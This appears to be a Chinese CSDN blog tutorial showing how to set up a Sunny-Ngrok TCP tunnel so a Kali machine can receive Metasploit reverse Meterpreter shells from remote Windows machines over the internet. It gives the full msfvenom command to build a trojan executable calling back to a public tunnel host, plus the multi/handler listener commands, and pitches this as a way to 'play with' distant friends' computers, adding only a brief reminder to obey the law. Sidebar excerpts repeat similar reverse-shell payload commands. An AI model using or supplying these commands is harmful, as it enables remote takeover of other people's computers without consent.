MSF实现远程渗透

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量2.4k 收藏 61
点赞数 6
分类专栏: kali msf 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/112546912
版权
msf 同时被 2 个专栏收录
2 篇文章 0 订阅
订阅专栏
kali
1 篇文章 0 订阅
订阅专栏

MSF实现远程渗透

在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。

0x01环境准备

系统:Kali linux

工具:MSF、 Sunny-Ngrok

0x02环境部署

打开Sunny官网 (www.ngrok.cc),点击注册

在这里插入图片描述

完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖

在这里插入图片描述

可阅读,确认

在这里插入图片描述

隧道协议选择tcp,然后为你的隧道取个名称,选择一个 10000-11000的端口 ,这个端口是服务器的端口,这里笔者选择10668(刚刚已经选择了所以就提示被使用,小伙伴们可选择一个可用的即可)

在这里插入图片描述

接下来打开 kali ,查看本机ip地址

在这里插入图片描述

返回填写本地端口,ip填我们本地kali的ip,端口自行选择一个,笔者选择的是5656,然后确认添加,确认开通即可

在这里插入图片描述

点击隧道管理即可看到我们白嫖的一个隧道

在这里插入图片描述

接下来是部署客户端,下载地址https://www.ngrok.cc/download.html,笔者的系统是Linux 64bit,所以我下载相应的版本

在这里插入图片描述

下载完成解压就会得到一个 sunny 文件

在这里插入图片描述

刚刚我们开通的隧道有一个id,先去复制这个id

在这里插入图片描述

终端启动sunny

./sunny clientid *********(**为通道的id)

在这里插入图片描述

成功启动如下

在这里插入图片描述

也可在官网查看状态

在这里插入图片描述

至此环境搭建完成

0x03小试牛刀

测试靶机:win7

打开一个新的终端,使用msf生成一个windows木马,LPORT端口设置为你的自己的端口(就是刚刚服务器隧道的端口)

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=free.idcfengye.com LPORT=10668 -f exe -o spaceman.exe

生成木马

在这里插入图片描述

将木马文件放至 win7 靶机中

在这里插入图片描述

启动msf,开始渗透

msfconsole

use exploit/multi/handler  

set payload windows/x64/meterpreter/reverse_tcp  

set lhost 192.168.30.5  //所填写的ip,也就是本地kali的ip

set lport 5656  //填写的端口,笔者的是5656

exploit

在这里插入图片描述

在这里插入图片描述

靶机win7运行木马程序,kali成功接收,查看系统信息 sysinfo

在这里插入图片描述

其他msf指令等等操作不在过多啰嗦

0x04总结

木马不是免杀木马,感兴趣的小伙伴可以自行去了解,但作为一个安全的萌新,笔者也希望小伙伴们遵纪守法,笔者有不对的地方希望各位大佬指点指点。

Spaceman-911
关注
  • 6
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
【网络安全】渗透测试神器-msf基础
2201_75856701的博客
03-09 537
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriodencoders没啥用,编码,自己提供编码倒是可以evasion:免杀,也没啥用,现在免杀也免不了被杀Ms17-010:ms指微软17-010指17年编号010的漏洞。
MSF内网渗透实战
hackzkaq的博客
05-17 3801
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 1791
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3100
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
msf-haskell:Haskell Metasploit远程API的实现
05-31
无国界医生哈斯克尔 介绍 该目录包含 Haskell Metasploit 绑定和库,以及描述该库目的和使用的。 简而言之, 是一个广泛部署的开源渗透测试平台。... 截至 2013 年初,此绑定与 MSF API 兼容,但尚未在更新
msf命令全集
06-05
MSF(Metasploit Framework)是一款功能强大且功能丰富的渗透测试工具,提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:从当前环境返回...
Msf攻击Win7
07-09
最后,执行exploit,等待连接建立,从而实现对Win7系统的渗透。 总的来说,Msf攻击Win7涉及到的信息安全实践包括:漏洞扫描(使用Nessus)、漏洞利用(使用Metasploit)以及对目标系统的远程控制。在整个过程中,...
msf autopwn
06-23
msf autopwn 可以自动选择合适的 payload,并将其发送到成功利用的系统上,以实现远程访问或进一步的攻击。 6. **后渗透操作**:一旦攻击成功,msf autopwn 可能会执行一些后渗透任务,如收集系统信息、安装后门、...
msf攻击Mysql服务.docx
04-26
4. **exploit/windows/mysql/scrutinizer_upload_exec**:此插件允许攻击者上传文件到MySQL服务器并执行,从而实现远程代码执行,这在目标系统有特定的安全漏洞时尤其有效。 5. **auxiliary/scanner/mysql/mysql_...
从零开始学网安:Day3 体验跨网段渗透与后渗透经验分享
无业de小白的博客
05-07 393
这一次分享一些跨网段渗透与简单后渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
超牛叉的外网渗透详细教程
cheyunhua的博客
03-22 6153
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器。 但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。 搜索结果的话, 首先,虚拟机里的kali不能渗透到外网的原因是它没有外网IP。 所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。 本质其实都一样。但是亲测后者比较有用。 可!是! 第二个方法有一个特点,就是很烦。 买好服务器之后再下载frp,服务器
Metasploit后渗透技巧[1] 内网搭桥【转】
qdslg的专栏
07-29 905
对于一次成功的渗透测试,往往都需要很多优秀的工具进行辅助。在渗透测试中听说用的最多的是一个叫做metasploit。因此想从屌丝脚本小子变成了土豪级脚本小子。所以开始了metasploit学习之旅,希望在记录下自己成长的足迹,把没有学习到知识点,无论大小都记录下来。因此有了下面和下下面的相关文章,如有错误请给予指正。 一、问题描述 在渗透测试时,m...
关于使用msf渗透攻击Win7主机并远程执行命令的复习
weixin_44663190的博客
04-16 5457
关于使用msf渗透攻击Win7主机并远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 关于kali系统和win7 旗舰版sp1的安装就不多赘述,很多博文都已经讲述 1.1 打开虚拟机软件,准备开始环境 1.2 打开已经配置好的两个虚拟环境 1.3 配置...
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6262
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
ONE DAY |网络安全渗透测试之跨网段攻击
EverUP
05-04 1930
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
Ngrok内网穿透配合msf木马
sky
06-18 4117
Ngrok内网穿透配合msf木马   1. Ngrok的安装 原文地址:http://www.ggsec.cn/ Ngrok的下载地址:https://ngrok.com/download 下载对应版本并注册帐号 解压后将其放入 /bin/ ngrok  authtoken 6RBm_2CfWq3xAJ3XVK(6RBm_2CfWq3xAJ3XVK是你注册后给你的)   2.tc
ngrock内网穿透(Ngrok 和 Sunny-Ngrok )
weixin_43229729的博客
03-23 1万+
由于最近做支付功能,支付宝访问的回调接口必须是外网可以访问的,而目前在开发阶段,没有部署到正式环境(公司的域名为正式环境的)。所以在开发测试时需要用到ngrok,将自己电脑ip暴露在外网上。 什么是内网穿透? 内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透。简单来说,就是让身处局域网的电脑,被大家都能访问的技术。 Ngro...
MSF的钓鱼渗透攻击原理
最新发布
05-26
MSF(Metasploit Framework)是一款常用的渗透测试工具,它可以通过钓鱼攻击来获取目标计算机的访问权限。 钓鱼攻击原理是利用社交工程学原理,通过发送欺骗性的信息或者伪造网站等方式,诱导目标用户点击链接或者下载文件,从而在其计算机中植入木马或者后门程序。当攻击者获取了目标计算机的访问权限后,就可以利用漏洞或者其他方式获取敏感信息或者控制目标计算机。 MSF钓鱼渗透攻击主要分为以下几个步骤: 1. 伪造欺骗性信息:攻击者利用社交工程学原理,伪造看似真实的邮件、网站等信息,以诱导目标用户点击链接或下载文件。 2. 植入木马或后门程序:一旦目标用户点击链接或下载文件,攻击者就会在其计算机中植入木马或后门程序,从而获取访问权限。 3. 利用漏洞获取敏感信息:攻击者可以利用漏洞或其他方式获取目标计算机中的敏感信息。 4. 控制目标计算机:攻击者可以利用木马或后门程序对目标计算机进行控制,例如远程执行命令、上传下载文件等操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值